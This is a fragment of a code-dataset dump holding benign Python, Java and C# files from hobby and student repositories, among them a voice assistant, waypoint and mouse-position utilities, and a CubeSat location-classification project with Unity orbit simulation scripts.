fullnamejson)\nprint(fullnamejson)\n\n# define x y and z\nx, y, z =first_line.split(',')\n\n# define formatted as what will be written to the file\nformatted = \"{\\n \\\"id\\\": \\\"\" + fullname + \"\\\",\\n \\\"name\\\": \\\"END\\\",\\n \\\"icon\\\": \\\"waypoint-normal.png\\\",\\n \\\"x\\\": \" + x + \",\\n \\\"y\\\": \" + y + \",\\n \\\"z\\\": \" + z + \",\\n \\\"r\\\": 61,\\n \\\"g\\\": 1,\\n \\\"b\\\": 164,\\n \\\"enable\\\": true,\\n \\\"type\\\": \\\"Normal\\\",\\n \\\"origin\\\": \\\"journeymap\\\",\\n \\\"dimensions\\\": [\\n 0\\n ],\\n \\\"persistent\\\": true\\n}\"\nprint(formatted)\n\n# write to file\nwith open(fullnamejson, \"w\") as text_file:\n\t##print(f(fullnamejson), file=text_file)\n\tprint(f'{formatted}', file=text_file)\n\n" }, { "alpha_fraction": 0.6213333606719971, "alphanum_fraction": 0.637333333492279, "avg_line_length": 25.785715103149414, "blob_id": "b1609a5d2e1bcaae08dd7fde347a40051bcb176c", "content_id": "90632d2adfffff546813b0aa61a083aba03d6af8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 66, "num_lines": 14, "path": "/tesseract-python2/current-mouse-pos.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import pyautogui, sys\n\nprint('Press Ctrl-C to quit.')\ntry:\n\twhile True:\n\t\tx, y = pyautogui.position()\n\t\tpositionStr = 'X: ' + str(x).rjust(4) + ' Y: ' + str(y).rjust(4)\n\t\tpositionStr2 = '\\b' * (len(positionStr) + 2)\n\t\twith open('output3.txt', 'w') as f:\n\t\t\tprint(positionStr, file=f)\n\t\t\tprint(positionStr2, file=f)\n\t\tsys.stdout.flush()\nexcept KeyboardInterrupt:\n\tprint('\\n')\n" } ]
18
WilverC/VozPython
https://github.com/WilverC/VozPython
8500cd03d410d0104423c34b265822f053cb335c
80bf5a68a86b239b91f657977f20f64b90114c28
b543847966fe34780a2be1fea9d931ccc2b19b00
refs/heads/master
2023-04-20T16:15:17.114927
2021-05-12T19:24:38
2021-05-12T19:24:38
366,822,352
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.541141152381897, "alphanum_fraction": 0.5447447299957275, "avg_line_length": 29.83333396911621, "blob_id": "93ac8f7b706b824a8766b624a221607a9ab41bf4", "content_id": "460fcc9dc2e47f341d32ec5822583260f4ac442e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1666, "license_type": "no_license", "max_line_length": 75, "num_lines": 54, "path": "/Asistente.py", "repo_name": "WilverC/VozPython", "src_encoding": "UTF-8", "text": "import pyttsx3 as voz\nimport speech_recognition as sr\nimport subprocess as sb\nimport datetime as dt\n\n#configuracion de la voz del asistente\nvoice = voz.init()\nvoices = voice.getProperty('voices')\nvoice.setProperty('voice', voices[0].id)\nvoice.setProperty('rate', 140)\n\ndef say(text):\n voice.say(text)\n voice.runAndWait()\n\nwhile True:\n recognizer = sr.Recognizer()\n\n #Activar microfono\n with sr.Microphone() as source:\n print('Escuchando...')\n audio = recognizer.listen(source, phrase_time_limit=3)\n \n try: #si entiende la peticion, entramos en la logica\n comando = recognizer.recognize_google( audio, language='es-MX')\n print(f'Creo que dijiste \"{comando}\"')\n\n comando = comando.lower()\n comando = comando.split(' ')\n\n if 'computadora' in comando:\n if 'abre' in comando or 'abrir' in comando:\n\n sites = {\n 'google' : 'google.com',\n 'youtube' : 'youtube.com',\n 'instagram' : 'instagram.com'\n }\n\n for i in list( sites.keys() ):\n if i in comando:\n sb.call(f'start chrome.exe {sites[i]}', shell=True)\n say(f'Abriendo {i}')\n elif 'hora' in comando:\n time = dt.now().strftime('%H:%M')\n say(f'Son las {time}')\n\n for i in ['termina','terminar', 'término']:\n if i in comando:\n say('Sesion finalizada')\n break\n \n except: #Si no entiende nos dara un mensaje\n print('No entendi, por favor vuelve a intentarlo')\n" } ]
1
gerkenma/Position-Detection
https://github.com/gerkenma/Position-Detection
3f92f06b6da048f4a80f684029c2d460c83f69b0
f2bd08352e0e316d7f5ffd191e45e689e5b5aba6
79e627bb08eefe0eab5e1e4b98b07d838fe59975
refs/heads/master
2023-02-25T10:16:08.742118
2020-05-16T14:39:50
2020-05-16T14:39:50
188,628,053
0
0
null
2019-05-26T01:27:56
2020-05-16T14:39:58
2023-02-15T21:23:58
C#
[ { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 86.5, "blob_id": "2c0a27c809c98ab454e46f51d137f3f32eaa3ae4", "content_id": "156133f83d4b21f6332685b285e0c2f061564518", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 174, "license_type": "no_license", "max_line_length": 147, "num_lines": 2, "path": "/training_data_generation/README.md", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "# Training Data Generation\nAll info about using the Unity simulation to generate pictures as training data can be found in Unity_Simulation_and_Orekit_Java_Program_Guide.docx" }, { "alpha_fraction": 0.5989304780960083, "alphanum_fraction": 0.6233206987380981, "avg_line_length": 39.566139221191406, "blob_id": "51a67f88815e3f3249bebce9395af27775e97f4c", "content_id": "818257aab0714a0c4ee150e5dda19d968db892c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 7669, "license_type": "no_license", "max_line_length": 155, "num_lines": 189, "path": "/training_data_generation/scripts/Unity/MoonRotation.cs", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Runtime.Serialization.Formatters.Binary;\nusing System.IO;\nusing UnityEngine;\n\npublic class MoonRotation : MonoBehaviour {\n //This script governs the behavior of the Moon component in the Unity environment\n //It interpolates between the points described in the MoonData.csv file\n\n //A tutorial that shows the basic methodology used in implementing interpolation can be found on\n //the Vector3.Lerp page in the Unity Scripting API\n\n //List of ArrayLists that contains all of the parsed data from the csv file\n List<ArrayList> table = new List<ArrayList>();\n\n //Boolean variable that keeps track of whether the year specfied in the DateConfig file is \"2019\"\n private bool istwoZeroOneNine = true;\n\n //Arrays to keep track of the total days of the year elapsed at the start of each month\n private int[] twoZeroOneNineDaySumsByMonth = { 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334 };\n private int[] twoZerotwoZeroDaySumsByMonth = { 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335 };\n\n //ArrayList to take the parsed data from the DateConfig file\n private ArrayList config = new ArrayList();\n\n //The number of units per second that the object travels in the simulation - can be increased or reduced manually\n private float speed = 20.0f;\n \n //Other variables to assist the script in interpolating between the points detailed in the MoonData.csv file\n private float startTime;\n private float journeyLength;\n private float fracJourney;\n private float distCovered;\n public int index = 0;\n private ArrayList startpoint;\n private ArrayList endpoint;\n private Vector3 startposition;\n private Vector3 endposition;\n\n //Scale factor to keep the Moon orbiting around the Earth at a 90 unit radius in Unity,\n //instead of at an astronomically high radius\n private float scalefactor = 19700000f;\n\n public static T DeepClone<T>(T obj)\n {\n using (var stream = new MemoryStream())\n {\n var formatter = new BinaryFormatter();\n formatter.Serialize(stream, obj);\n stream.Position = 0;\n return (T)formatter.Deserialize(stream);\n }\n }\n\n // Use this for initialization\n void Start()\n {\n\n //Code block that reads from the MoonData.csv file and loads the rows into the table variable\n using (var reader = new StreamReader(\"MoonData.csv\"))\n {\n string line;\n string[] values;\n ArrayList alist = new ArrayList();\n\n while (!reader.EndOfStream)\n {\n line = reader.ReadLine();\n values = line.Split(',');\n alist.Add(Convert.ToInt32(values[2]));\n alist.Add(Convert.ToInt32(values[3]));\n alist.Add(Convert.ToInt32(values[4]));\n alist.Add(Convert.ToInt32(values[5]));\n alist.Add(Convert.ToInt32(values[6]));\n alist.Add(Convert.ToInt32(values[7]));\n alist.Add(float.Parse(values[8], System.Globalization.NumberStyles.Float));\n alist.Add(float.Parse(values[9], System.Globalization.NumberStyles.Float));\n alist.Add(float.Parse(values[10], System.Globalization.NumberStyles.Float));\n table.Add(DeepClone(alist));\n alist.Clear();\n }\n }\n\n //Instantation of variables to assist in interpolation\n startTime = Time.time;\n startpoint = table[index];\n endpoint = table[index + 1];\n\n //The points in the Unity environment that the Moon should interpolate between\n //The points need to be converted from a space dynamics coordinate system to the Unity coordinate system\n //Space dynamics coordinates: (x, y, z)\n // |\n // V\n //Unity coordinates: (-y, z, x)\n //x, y, and z in space dynamics coordinates are rearranged in unity, so that\n //the y coordinate in space dynamics is made negative and is the new x coordinate in Unity\n //the x coordinate in space dynamics is made into the new z coordinate in Unity\n //the z coordinate in space dynamics is made into the new y coordinate in Unity\n startposition = new Vector3(-((float)startpoint[7] / scalefactor), ((float)startpoint[8] / scalefactor), ((float)startpoint[6] / scalefactor));\n endposition = new Vector3(-((float)endpoint[7] / scalefactor), ((float)endpoint[8] / scalefactor), ((float)endpoint[6] / scalefactor));\n\n journeyLength = Vector3.Distance(startposition, endposition);\n\n //Debug.Log(journeyLength);\n\n //Code block to read from the DateConfig file\n using (var reader2 = new StreamReader(\"DateConfig.txt\"))\n {\n string line;\n string[] values;\n\n while (!reader2.EndOfStream)\n {\n line = reader2.ReadLine();\n values = line.Split(' ');\n config.Add(values[1]);\n }\n }\n\n //Checks to see if the year is 2019 or not. If it's not, then the simulation starts reading from the 8761st row\n //in the csv file\n if ((string)config[0] == \"2019\")\n {\n\n }\n else\n {\n index += 8760;\n istwoZeroOneNine = false;\n }\n\n int month = Convert.ToInt32(config[1]);\n int day = Convert.ToInt32(config[2]);\n int hour = Convert.ToInt32(config[3]);\n\n //Code to figure out what row number in the csv file the simulation starts at\n //For every month, 24 * the number of days in that month is added to the starting row number\n //For every day, 24 are added to the starting row number\n //For every hour, 1 is added to the starting row number\n if (istwoZeroOneNine == true)\n {\n index += (twoZeroOneNineDaySumsByMonth[month - 1] * 24) + ((day - 1) * 24) + (hour);\n }\n else\n {\n index += (twoZerotwoZeroDaySumsByMonth[month - 1] * 24) + ((day - 1) * 24) + (hour);\n }\n\n //Debug.Log(index + 1);\n }\n\n // Update is called once per frame\n void Update()\n {\n //transform.RotateAround(Vector3.zero, new Vector3(0, 1, 0), 2.5f*Time.deltaTime);\n\n //If Point B is reached by the directional light, the next point is taken from the csv file, and the directional\n //light component starts interpolating to that point\n if ((transform.position == endposition) && ((index + 1) != (table.Count - 1)))\n {\n index++;\n\n distCovered = 0;\n fracJourney = 0;\n startTime = Time.time;\n startpoint = table[index];\n endpoint = table[index + 1];\n\n startposition = new Vector3(-((float)startpoint[7] / scalefactor), ((float)startpoint[8] / scalefactor), ((float)startpoint[6] / scalefactor));\n endposition = new Vector3(-((float)endpoint[7] / scalefactor), ((float)endpoint[8] / scalefactor), ((float)endpoint[6] / scalefactor));\n\n journeyLength = Vector3.Distance(startposition, endposition);\n //Debug.Log(journeyLength);\n }\n\n //Code to do the interpolation process\n distCovered = (Time.time - startTime) * speed;\n\n fracJourney = distCovered / journeyLength;\n\n transform.position = Vector3.Lerp(startposition, endposition, fracJourney);\n\n //Ensures that the directional light component continuously looks at the center of the\n //Unity environment - where Earth is\n transform.LookAt(Vector3.zero);\n }\n}\n" }, { "alpha_fraction": 0.7789676189422607, "alphanum_fraction": 0.7833607792854309, "avg_line_length": 78.15217590332031, "blob_id": "c93cd9979656ce616c91656efffe212355c85dd5", "content_id": "d64aad2e5a77c008996eafa2faea96cc87a5456c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3642, "license_type": "no_license", "max_line_length": 1635, "num_lines": 46, "path": "/README.md", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "# CubeSat Location Identification\n\n## Team\n\n**Developer**\n> Mark Gerken\n> Rohith Perla\n> Jackson Wark\n\n\n**Professor:**\n> David Ferry, PhD.\n\n**Faculty Mentor**\n> Erin Chambers, PhD.\n\n**Client**\n> Keith Bennett\n\n## Requirements\n- Python 2.6+\n- TensorFlow 1.13.x\n- Numpy 1.15.x\n- ARES 1.3\n\n## Set up\n\n1. ~ARES installed to Raspberry Pi Zero via [install guide](https://github.com/gerkenma/Position-Detection).~ (ARES removed from public facing git repository)\n2. Install [Python](https://www.python.org/downloads/)\n3. If not installed, install Virtualenv with `pip install virtualenv`\n4. Navigate in a terminal window to the root directory of the project and set up a virtual environment with `virtualenv venv`\n5. Activate the virtual environment with `venv\\Scripts\\activate` on a Windows machine or `source venv\\bin\\activate`\n\t- *More complete directions can be found [here](https://virtualenv.pypa.io/en/stable/userguide/#activate-script)*\n6. Install the required Python packages with `pip install -r requirements.txt\n\n*Note: ARES software not included within repo due to private nature*\n\n*Note: Training datasets not included within repo due to large size, however samples are available [here](https://github.com/gerkenma/Position-Detection/tree/master/training_data_generation/picture_examples).* \n\n## Training\n\nTraining data generated from Unity simulation. The program [cnn_classifier.py](https://github.com/gerkenma/Position-Detection/blob/master/cnn_files/cnn_classifier.py) should be trained on external hardware, not the Raspberry Pi. Datasets may be created by pointing appropriate datapath to a directory containing subdirectories of all possible classifications. All images inside each subdirectory is assumed to belong to that classification label. All training automatically completes with an evalation of a percentage of the data and outputs the results to the file [cnn_results.csv](https://github.com/gerkenma/Position-Detection/blob/master/cnn_files/cnn_results.csv).\n\n## Porting Trained Neural Network to Raspberry Pi Zero\n\nOnce the network is trained checkpoint files (.ckpt) will have automatically been generated in the directory specified as the model directory in cnn_classifier.py. This directory in it's entirety may be copied to the Raspberry Pi, but it may be more desirable to copy only the neccessary files due to their size. The neccessary files are those marked as 'model.ckpt-X.Y' where X is an integer and Y is either data, index, or meta. The checkpoint with the highest X is the most recent and will be used for inference. Copy all three types (or the entire directory) to the directory 'ares/aps/tmp/space_classifier_model/' after first removing its previous contents. Open the file APSReasonerLOCORI.py. Check the global dictionary 'selected_params' and replace the values of the hyperparameters with the corresponding values from cnn_results.csv for the selected trial. If changes have been made to the 'cnn_model_fn()' in cnn_classifier.py before training, replace the 'cnn_model_fn()' in APSReasonerLOCORI.py with the identical new model function from the training script. This may also warrant changes to the 'predict_input_fn()' if the input size has changed. To run inference, place one or more images in the directory 'ares/aps/tmp/predictions/predictions/'. Navigate to 'ares/aps/' and run the command 'python APSUI.py'. This will run the user interface for the APS subsystem with LOCORI loaded. The user interface will prompt several times. Type 'ta' to run the test platform, and press the the return key for the next four to run default settings. When prompted how many steps to run, press return to execute the default one step. \n" }, { "alpha_fraction": 0.47183099389076233, "alphanum_fraction": 0.6830986142158508, "avg_line_length": 15.384614944458008, "blob_id": "e5ee0fe835e5aa85a55f404227e91df41a20a53d", "content_id": "58bb0bf5b8cc850079d87c8a7d39817124ad7067", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 426, "license_type": "no_license", "max_line_length": 26, "num_lines": 26, "path": "/requirements.txt", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "absl-py==0.7.0\nastor==0.7.1\ncertifi==2019.3.9\ndecorator==4.4.0\nfuture==0.17.1\ngast==0.2.2\ngrpcio==1.16.1\nh5py==2.9.0\nhyperopt==0.1.2\nKeras-Applications==1.0.7\nKeras-Preprocessing==1.0.9\nMarkdown==3.0.1\nmkl-fft==1.0.6\nmkl-random==1.0.1\nnetworkx==2.3\nnumpy==1.15.4\nprotobuf==3.6.0\npymongo==3.7.2\nscikit-learn==0.20.1\nscipy==1.1.0\nsix==1.12.0\ntensorboard==1.11.0\ntensorflow==1.15.2\ntermcolor==1.1.0\ntqdm==4.31.1\nWerkzeug==0.15.2\n" }, { "alpha_fraction": 0.6679501533508301, "alphanum_fraction": 0.6807847619056702, "avg_line_length": 33.738853454589844, "blob_id": "d7c5bbba22bdcceba6d84b43e7127dc14e4a7d52", "content_id": "bc6914e2ffb801aa5979f86709aaa87e661ae25c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5454, "license_type": "no_license", "max_line_length": 145, "num_lines": 157, "path": "/training_data_generation/scripts/Java/DataGen.java", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "package datagen;\n\nimport java.io.File;\nimport java.io.FileNotFoundException;\nimport java.io.PrintWriter;\nimport java.time.LocalDateTime;\n\nimport org.hipparchus.geometry.euclidean.threed.Vector3D;\nimport org.orekit.bodies.*;\nimport org.orekit.data.DataProvidersManager;\nimport org.orekit.data.DirectoryCrawler;\nimport org.orekit.frames.FramesFactory;\nimport org.orekit.time.AbsoluteDate;\nimport org.orekit.time.TimeScalesFactory;\nimport org.orekit.utils.IERSConventions;\nimport org.orekit.frames.ITRFVersion;\n\n\npublic class DataGen {\n\n\tpublic static void main(String[] args) {\n\t\t\n\t\t//Code block to establish a path to an ephemeride data directory, as well as search through it to find the appropriate data\n\t\tFile orekitData = new File(\"/Users/rperl/eclipse-workspace/orekit-data\");\n\t\tDataProvidersManager manager = DataProvidersManager.getInstance();\n\t\tmanager.addProvider(new DirectoryCrawler(orekitData));\n\t\t\n\t\t\n\t\t//Main block of program - generates coordinates for a celestial body at a given time in a certain coordinate frame (ITRf currently) and outputs\n\t\t//them to a csv file\n\t\ttry(PrintWriter writer = new PrintWriter(new File(\"MoonData.csv\"))){\n\t\t\n\t\t\t//datetime variable - change this to change the start date/time for the generated csv file\n\t\t\tLocalDateTime datetime = LocalDateTime.of(2019, 1, 1, 0, 0, 0);\n\t\t\t\n\t\t\t//Orekit's version of date/time - will work off of the date time variable\n\t\t\tAbsoluteDate date = new AbsoluteDate(2019, 1, 1, 0, 0, 0.0, TimeScalesFactory.getUTC());\n\t\t\t\n\t\t\t\n\t\t\t//Instances of the CelestialBody class for the sun and moon\n\t\t\tCelestialBody sun = CelestialBodyFactory.getSun();\n\t\t\tCelestialBody moon = CelestialBodyFactory.getMoon();\n\t\t\t\n\t\t\t//Main method of the program - takes the date variable, as well as a coordinate frame, and outputs position and velocity vectors, and\n\t\t\t//only the position vector is saved to the vector variable\n\t\t\t//To get coordinates for the moon instead, simply replace \"sun\" in the below line with \"moon\"\n\t\t\tVector3D vector = moon.getPVCoordinates(date, FramesFactory.getITRF(ITRFVersion.ITRF_2014, IERSConventions.IERS_2010, true)).getPosition();\n\t\t\t\n\t\t\t//Gets the x, y, and z coordinates of the position vector and formats them in terms of scientific notation\n\t\t\tString xvector = Double.toString(vector.getX());\n\t\t\txvector = xvector.replace('E', 'e');\n\t\t\t\n\t\t\tString yvector = Double.toString(vector.getY());\n\t\t\tyvector = yvector.replace('E', 'e');\n\t\t\t\n\t\t\tString zvector = Double.toString(vector.getZ());\n\t\t\tzvector = zvector.replace('E', 'e');\n\t\t\t\n\t\t\tint row = 1;\n\t\t\t\n\t\t\t//Writes the date, time, and position vectors to a StringBuilder and then the string in the StringBuilder is written into the csv file\n\t\t\t//Each line is of the form:\n\t\t\t//id,<row number>,<Year>,<Month Number>,<Day of Month>,<Hour>,<Minute>,<Second>,<X-coordinate>,<Y-coordinate>,<Z-coordinate>\n\t\t\tStringBuilder sb = new StringBuilder();\n\t\t\tsb.append(\"id,\");\n\t\t\tsb.append(Integer.toString(row));\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getYear());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getMonthValue());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getDayOfMonth());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getHour());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getMinute());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append((double) datetime.getSecond());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(xvector);\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(yvector);\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(zvector);\n\t\t\tsb.append(\"\\n\");\n\t\t\t\n\t\t\t//System.out.println(sb.toString());\n\t\t\twriter.write(sb.toString());\n\t\t\t\n\t\t\tsb.setLength(0);\n\t\t\t\n\t\t\trow++;\n\t\t\t\n\t\t\t//Loops the entire block above for another 17,543 times. Total number of lines written to the csv file is 17,544 - the total number of\n\t\t\t//hours in 2019 and 2020. To get a longer or shorter csv file, simply change the \"17543\" below to the amount of desired hours\n\t\t\t//the program should take coordinates for\n\t\t\t//The program increments in hours, and that can be changed if so needed\n\t\t\tfor(int i = 0; i < 17543; i++) {\n\t\t\t\tdatetime = datetime.plusHours(1);\n\t\t\t\tdate = new AbsoluteDate(datetime.getYear(), \n\t\t\t\t\t\tdatetime.getMonthValue(), \n\t\t\t\t\t\tdatetime.getDayOfMonth(), \n\t\t\t\t\t\tdatetime.getHour(), \n\t\t\t\t\t\tdatetime.getMinute(), \n\t\t\t\t\t\t(double) datetime.getSecond(), \n\t\t\t\t\t\tTimeScalesFactory.getUTC());\n\t\t\t\t\n\t\t\t\tvector = moon.getPVCoordinates(date, FramesFactory.getITRF(ITRFVersion.ITRF_2014, IERSConventions.IERS_2010, true)).getPosition();\n\t\t\t\t\n\t\t\t\txvector = Double.toString(vector.getX());\n\t\t\t\txvector = xvector.replace('E', 'e');\n\t\t\t\t\n\t\t\t\tyvector = Double.toString(vector.getY());\n\t\t\t\tyvector = yvector.replace('E', 'e');\n\t\t\t\t\n\t\t\t\tzvector = Double.toString(vector.getZ());\n\t\t\t\tzvector = zvector.replace('E', 'e');\n\t\t\t\t\n\t\t\t\tsb.append(\"id,\");\n\t\t\t\tsb.append(Integer.toString(row));\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getYear());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getMonthValue());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getDayOfMonth());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getHour());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getMinute());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append((double) datetime.getSecond());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(xvector);\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(yvector);\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(zvector);\n\t\t\t\tsb.append(\"\\n\");\n\t\t\t\t\n\t\t\t\twriter.write(sb.toString());\n\t\t\t\t\n\t\t\t\tsb.setLength(0);\n\t\t\t\t\n\t\t\t\trow++;\n\t\t\t}\n\t\t\t\n\t\t\tSystem.out.println(\"Complete\");\n\t\t\t\n\t\t\t\n\t\t} catch(FileNotFoundException e) {\n\t\t\tSystem.out.println(e.getMessage());\n\t\t}\n\n\t}\n\n}\n" }, { "alpha_fraction": 0.42996522784233093, "alphanum_fraction": 0.48908424377441406, "avg_line_length": 40.57429885864258, "blob_id": "df50b1aeb6e48a7d328d33d9af3109d52fdda5d6", "content_id": "ac4f1fa736e99354280e5823f10348e93eae47d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 10354, "license_type": "no_license", "max_line_length": 176, "num_lines": 249, "path": "/training_data_generation/scripts/Unity/SatelliteOrbit.cs", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "using System.Collections;\nusing System.Collections.Generic;\nusing System;\nusing System.Globalization;\nusing System.IO;\nusing UnityEngine;\n\npublic class SatelliteOrbit : MonoBehaviour {\n //This script governs the behavior of the camera in the Unity environment. It functions akin to a satellite orbiting the Earth in real life.\n\n //Width and height of the pictures to be taken\n public int resWidth = 256;\n public int resHeight = 256;\n\n //Latitude and longitude variables\n public float lon = 0;\n public float lat = 0;\n\n //String to display what major region (continent or ocean) the camera is above\n public string region = \"\";\n\n public bool land;\n\n public int counter;\n\n private ArrayList config = new ArrayList();\n private float spinspeed;\n private float orbitspeed;\n private bool takePictures;\n\n private bool takeHiResShot = false;\n\n public float x = 0;\n public float y = 0;\n public float z = 0;\n\n public DateTime date = new DateTime(2018, 1, 1);\n \n //Method to create names for taken screenshots and output them to the appropriate directories. Change the string.Format() method as needed to suit the needs of your machine\n public static string ScreenShotName(int width, int height, string region)\n {\n return string.Format(\"{0}/screenshots/{1}/screen_{2}x{3}_{4}.png\",\n Application.dataPath, region,\n width, height,\n System.DateTime.Now.ToString(\"yyyy-MM-dd_HH-mm-ss-fff\", CultureInfo.InvariantCulture));\n }\n\n // Use this for initialization\n void Start () {\n counter = 0;\n land = false;\n\n using (var reader = new StreamReader(\"SimConfig.txt\"))\n {\n string line;\n string[] values;\n\n while (!reader.EndOfStream)\n {\n line = reader.ReadLine();\n values = line.Split(' ');\n config.Add(values[2]);\n }\n }\n\n spinspeed = Convert.ToSingle(config[0]);\n orbitspeed = Convert.ToSingle(config[1]);\n\n if((string) config[2] == \"Yes\")\n {\n takePictures = true;\n }\n\n else\n {\n takePictures = false;\n }\n\t}\n\n // Update is called once per frame\n void Update()\n {\n //Method for the camera to spin while it is rotating around the Earth\n transform.Rotate(0, spinspeed * Time.deltaTime, 0, Space.World);\n\n //Method for the camera to rotate around the Earth\n //To change the orbit angle, change the second parameter to the desired Vector3\n transform.RotateAround(Vector3.zero, new Vector3(0, 0.56f, 0.44f), orbitspeed * Time.deltaTime);\n\n\n land = false;\n\n //Methods to find the longitude and latitude of the satellite\n lon = Vector3.SignedAngle(transform.position, Vector3.right, Vector3.up);\n lat = 90f - Vector3.Angle(transform.position, Vector3.up);\n\n x = transform.position.x;\n y = transform.position.y;\n z = transform.position.z;\n\n\n //This entire block is dedicated to checking if the latitude and longitude of the camera falls into certain coordinate ranges\n //If the camera falls into a certain coordinate range, then depending on the range, that shows what major region the camera\n //is above\n //All coordinate ranges are detailed in the Latitude Longitude Approximates Excel file\n\n //North America\n if (((lon >= -170.0f && lon < -145.0f) && (lat > 55.0f && lat <= 70.0f)) //Alaska\n || ((lon >= -145.0f && lon < -120.0f) && (lat > 55.0f && lat <= 70.0f)) //Alaska/Canada\n || ((lon >= -120.0f && lon < -65.0f) && (lat > 60.0f && lat <= 85.0f)) //Northern Canada\n || ((lon >= -65.0f && lon < 20.0f) && (lat > 60.0f && lat <= 85.0f)) //Greenland\n || ((lon >= -130.0f && lon < -60.0f) && (lat > 45.0f && lat <= 60.0f)) //Canada\n || ((lon >= -125.0f && lon < -70.0f) && (lat > 30.0f && lat <= 50.0f)) //USA\n || ((lon >= -110.0f && lon < -100.0f) && (lat > 10.0f && lat <= 30.0f)) // Mexico\n || ((lon >= -100.0f && lon < -85.0f) && (lat > 10.0f && lat <= 20.0f)) //Central America\n || ((lon >= -85.0f && lon < -70.0f) && (lat > 15.0f && lat <= 25.0f))) //Caribbean\n {\n land = true;\n region = \"North_America\";\n }\n\n //South Ameria\n else if (((lon >= -80.0f && lon < -30.0f) && (lat > 0.0f && lat <= 10.0f)) //Upper South America\n || ((lon >= -80.0f && lon < -35.0f) && (lat > -20.0f && lat <= 0.0f)) //Brazil\n || ((lon >= -70.0f && lon < -50.0f) && (lat > -40.0f && lat <= -20.0f)) //Argentina and part of Chile\n || ((lon >= -70.0f && lon < -63.0f) && (lat > -55.0f && lat <= -40.0f))) //Southern tip\n {\n land = true;\n region = \"South_America\";\n }\n\n //Europe\n else if (((lon >= 5.0f && lon < 40.0f) && (lat > 60.0f && lat <= 70.0f)) //Scandinavia\n || ((lon >= -10.0f && lon < 17.0f) && (lat > 35.0f && lat <= 60.0f)) //Western Europe\n || ((lon >= 7.0f && lon < 40.0f) && (lat > 35.0f && lat <= 60.0f)) //Eastern Europe\n || ((lon >= 40.0f && lon < 60.0f) && (lat > 40.0f && lat <= 70.0f))) //European part of Russia\n {\n land = true;\n region = \"Europe\";\n }\n\n //Asia\n else if (((lon >= 30.0f && lon < 75.0f) && (lat > 30.0f && lat <= 37.0f)) //Middle East\n || ((lon >= 35.0f && lon < 60.0f) && (lat > 10.0f && lat <= 30.0f)) //Arabian Peninsula\n || ((lon >= 60.0f && lon < 140.0f) && (lat > 40.0f && lat <= 75.0f)) //Siberia\n || ((lon >= 70.0f && lon < 120.0f) && (lat > 10.0f && lat <= 40.0f)) //Central/South/East Asia\n || ((lon >= 95.0f && lon < 155.0f) && (lat > -10.0f && lat <= 5.0f)) //Indonesia\n || ((lon >= 120.0f && lon < 135.0f) && (lat > 30.0f && lat <= 40.0f)) //Korea/Japan\n || ((lon >= 140.0f && lon < 180.0f) && (lat > 60.0f && lat <= 70.0f))) //\"Land Bridge\" between Russia and Alaska\n {\n land = true;\n region = \"Asia\";\n }\n\n //Africa\n else if (((lon >= -15.0f && lon < 35.0f) && (lat > 5.0f && lat <= 35.0f)) //Sahara\n || ((lon >= 35.0f && lon < 40.0f) && (lat > 0.0f && lat <= 5.0f)) //Eastern Africa\n || ((lon >= 40.0f && lon < 52.0f) && (lat > 0.0f && lat <= 10.0f)) //Somalia\n || ((lon >= 10.0f && lon < 40.0f) && (lat > -35.0f && lat <= 5.0f)) //Central/Southern Africa\n || ((lon >= 35.0f && lon < 30.0f) && (lat > -25.0f && lat <= -10.0f))) //Madagascar\n {\n land = true;\n region = \"Africa\";\n }\n\n //Australia/New Zealand\n else if (((lon >= 120.0f && lon < 145.0f) && (lat > -20.0f && lat <= -10.0f)) //North Australia\n || ((lon >= 115.0f && lon < 155.0f) && (lat > -30.0f && lat <= -20.0f)) //Central Australia\n || ((lon >= 140.0f && lon < 150.0f) && (lat > -40.0f && lat <= -30.0f)) //Southeast Australia\n ||((lon >= 165.0f && lon < 180.0f) && (lat > -45.0f && lat <= -35.0f))) //New Zealand\n {\n land = true;\n region = \"Australia__New_Zealand\";\n }\n\n //Antarctica\n else if (((lon >= -80.0f && lon < -60.0f) && (lat > -70.0f && lat <= -60.0f)) //Tip close to South America\n || 